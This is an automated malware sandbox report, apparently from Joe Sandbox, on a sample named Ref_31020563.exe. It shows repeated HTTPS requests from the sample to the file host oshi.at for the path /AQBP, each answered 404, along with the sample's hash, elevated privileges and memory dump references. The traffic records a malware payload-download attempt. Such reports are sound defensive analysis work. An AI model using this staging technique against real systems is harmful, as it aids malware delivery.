                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:30:07 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:08 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:07 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:08 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          56 | 192.168.2.8 | 49772 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:30:10 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:10 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:10 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:10 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          57 | 192.168.2.8 | 49773 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:30:13 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:13 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:13 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:13 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          58 | 192.168.2.8 | 49774 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:30:15 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:16 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:16 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:16 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          59 | 192.168.2.8 | 49775 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:30:18 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:19 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:19 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:19 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          60 | 192.168.2.8 | 49776 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:30:21 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:22 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:22 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:22 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          61 | 192.168.2.8 | 49777 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:30:24 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:25 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:25 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:25 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          62 | 192.168.2.8 | 49778 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:30:27 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:28 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:28 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:28 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          63 | 192.168.2.8 | 49779 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:30:30 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:31 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:31 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:31 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Target ID: 0
                                          Start time: 10:27:22
                                          Start date: 10/12/2024
                                          Path: C:\Users\user\Desktop\Ref_31020563.exe
                                          Wow64 process (32bit): true
                                          Commandline: "C:\Users\user\Desktop\Ref_31020563.exe"
                                          Imagebase: 0x9c0000
                                          File size: 180'704 bytes
                                          MD5 hash: 7C8431A3C14296CFF7381CC69B61BAD8
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: C, C++ or other language
                                          Reputation: low
                                          Has exited: false

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3283381318.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1220000_Ref_31020563.jbxd